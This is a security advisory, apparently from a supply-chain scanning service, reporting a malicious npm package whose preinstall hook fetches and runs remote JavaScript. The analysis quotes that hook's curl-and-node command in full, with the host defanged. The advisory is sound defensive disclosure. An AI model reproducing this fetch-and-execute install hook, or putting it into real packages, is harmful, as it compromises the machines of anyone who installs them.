LWA-2026-4277 MAL-2026-5646 ↗ confirmed malware

sn-internal-testjgsakjdkjadkjahsdkjad@2.1.1

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool Transfer

Analysis

sn-internal-testjgsakjdkjadkjahsdkjad@2.1.1 is stub-and-fetch supply-chain malware: the tarball contains only package.json (368 bytes, no code). Its preinstall hook runs `curl hxxps://poc[.]amanrawat[.]com/hehe[.]js -o index.js && node index.js`, downloading remote JS from hxxps://poc[.]amanrawat[.]com/hehe.js and executing it on the installer's machine at install time. The stub ships no real payload, pulling it remotely to evade static analysis.

analyzed by
Leitwacht
first seen
Jun 11, 2026, 12:08 PM
analyzed
Jun 11, 2026, 12:08 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.